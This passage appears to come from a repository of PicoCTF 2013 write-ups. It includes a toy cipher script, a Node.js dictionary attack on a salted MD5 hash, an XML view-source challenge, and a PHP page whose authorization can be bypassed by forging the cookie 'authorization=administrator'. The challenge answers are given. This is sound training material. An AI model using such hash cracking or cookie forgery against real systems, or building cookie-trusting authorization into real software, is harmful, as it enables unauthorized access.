| ``` 73 | 74 | **Answer:** th4ts_w0rs3_th4n_DES 75 | 76 | ## Other write-ups and resources 77 | 78 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/trivial/encrypt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | 4 | alphaL = "abcdefghijklnmopqrstuvqxyz" 5 | alphaU = "ABCDEFGHIJKLMNOPQRSTUVQXYZ" 6 | num = "0123456789" 7 | keychars = num+alphaL+alphaU 8 | 9 | if len(sys.argv) != 3: 10 | print "Usage: %s SECRET_KEY PLAINTEXT"%(sys.argv[0]) 11 | sys.exit() 12 | 13 | key = sys.argv[1] 14 | if not key.isalnum(): 15 | print "Your key is invalid, it may only be alphanumeric characters" 16 | sys.exit() 17 | 18 | plaintext = sys.argv[2] 19 | 20 | ciphertext = "" 21 | for i in range(len(plaintext)): 22 | rotate_amount = keychars.index(key[i%len(key)]) 23 | if plaintext[i] in alphaL: 24 | enc_char = ord('a') + (ord(plaintext[i])-ord('a')+rotate_amount)%26 25 | elif plaintext[i] in alphaU: 26 | enc_char = ord('A') + (ord(plaintext[i])-ord('A')+rotate_amount)%26 27 | elif plaintext[i] in num: 28 | enc_char = ord('0') + (ord(plaintext[i])-ord('0')+rotate_amount)%10 29 | else: 30 | enc_char = ord(plaintext[i]) 31 | ciphertext = ciphertext + chr(enc_char) 32 | 33 | print "Encryption complete, ENC(%s,%s) = %s"%(plaintext,key,ciphertext) 34 | -------------------------------------------------------------------------------- /pico-ctf-2013/try-them-all/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Try Them All! 2 | 3 | **Category:** Crypto 4 | **Points:** 45 5 | **Description:** 6 | 7 | > You have found a passwd file containing salted passwords. An unprotected configuration file has revealed a salt of 5948. The hashed password for the 'admin' user appears to be 02ed2bf40532f187ec9334ef37f75591, try to brute force this password. 8 | 9 | ## Write-up 10 | 11 | Hint: There are [MD5 implementations](http://userpages.umbc.edu/~mabzug1/cs/md5/md5.html) for every major programming language. If you don't know what a [salt](http://en.wikipedia.org/wiki/Salt_%28cryptography%29) is, don't worry, it's just a string appended to the password. 12 | 13 | Quote: "*it's just a string appended to the password*" 14 | 15 | We'll focus on **salt of** `5948` and **hashed password** `02ed2bf40532f187ec9334ef37f75591`. Two values is different with every machine. But we'll understand the progress is: 16 | 17 | ```md5_encrypt(cleartext password + salt number) => hashed password``` 18 | 19 | This [code](trythemall.js) bruteforce cleartext password base on [Linux standar dictionary password](cracklib-small.txt). To run it, must install [Node.js](http://nodejs.org/download/). And remember to edit trythemall.js. 20 | 21 | **Answer:** allege 22 | 23 | ## Other write-ups and resources 24 | 25 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/try-them-all/trythemall.js: -------------------------------------------------------------------------------- 1 | var fs = require("fs"); 2 | var crypto = require('crypto'); 3 | var words = (fs.readFileSync("cracklib-small.txt") + "").split("\n"); 4 | for (i in words) { 5 | var word = words[i]; 6 | var md5sum = crypto.createHash("md5").update(word + "5948").digest("hex"); 7 | if (md5sum === "02ed2bf40532f187ec9334ef37f75591") { 8 | console.log(word); 9 | } 10 | } -------------------------------------------------------------------------------- /pico-ctf-2013/xmlol/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: XMLOL 2 | 3 | **Category:** WebVuln 4 | **Points:** 30 5 | **Description:** 6 | 7 | > The book has instructions on how to dump the corrupted configuration file from the robot's memory. You find a corrupted [XML file](https://2013.picoctf.com/autoproblems/tmpVrg2Ah.xml) and are looking for a configuration key. 8 | > 9 | > [file offline](tmpVrg2Ah.xml) 10 | 11 | ## Write-up 12 | 13 | We can view-source by `Ctrl+U`. 14 | 15 | ```xml 16 | 534987452539085818703732732882 17 | ``` 18 | 19 | **Answer:** 534987452539085818703732732882 20 | 21 | ## Other write-ups and resources 22 | 23 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/xmlol/tmpVrg2Ah.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 534987452539085818703732732882 8 | 9 | -------------------------------------------------------------------------------- /pico-ctf-2013/yummy/README.md: -------------------------------------------------------------------------------- 1 | # PicoCTF 2013: Yummy 2 | 3 | **Category:** Web Vuln 4 | **Points:** 60 5 | **Description:** 6 | 7 | > You want to find out the docking bay numbers for space ships that are ready to launch. Luckily for you, [the website](https://2013.picoctf.com/problems/yummy) for the docking bay ship status page doesn't seem so secure.... 8 | > 9 | > Enter the docking bay for any of the ships that are awaiting launch. 10 | 11 | ## Write-up 12 | 13 | `Ctrl+U` > viewsource: 14 | 15 | ```html 16 |
17 |

Docking Bay Ship Status

18 | 19 |

Login Failure

20 |
21 |

You are not authorized to view this page.

23 |
24 | ``` 25 | Important is `Expected Cookie: "authorization=administrator"` 26 | 27 | By a tool [edithiscookie](https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg), add cookie entry: "authorization=administrator", a list will display. 28 | 29 | We need "the docking bay for any of the ships that are **awaiting launch**.". 30 | 31 | **Answer:** `DX6-7` or `DX7-2` or `DX9-5` or `DX4-9` 32 | 33 | ## Other write-ups and resources 34 | 35 | * none yet -------------------------------------------------------------------------------- /pico-ctf-2013/yummy/yummy.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | SpacePort Authentication Server 4 | 5 | 6 |
7 |

Docking Bay Ship Status

8 | 9 | Login Success. 13 |
14 |
15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 |
Docking BayShip DesignationStatus
DX9-2Proud Planetary ProwlerUnder Repair
DX5-2Century EagleFuelling
DX6-7USS FranchiseAwaiting Launch
DX7-1HMS BeagleUnder Repair
DX7-2Pwnie ExpressAwaiting Launch
DX9-5Happy Fun Time Awesome Best ShipAwaiting Launch
DX2-2RoflcopterUnder Repair
DX4-5YHXS-2 GhostUnder Repair
DX4-9TheseusAwaiting Launch
DX8-2Drone DK97Fuelling
73 | END; 74 | } 75 | else { 76 | echo <<Login Failure 78 |
79 |

You are not authorized to view this page.

80 | END; 81 | echo ""; 83 | } 84 | ?> 85 | 86 |
87 | 88 | 89 | --------------------------------------------------------------------------------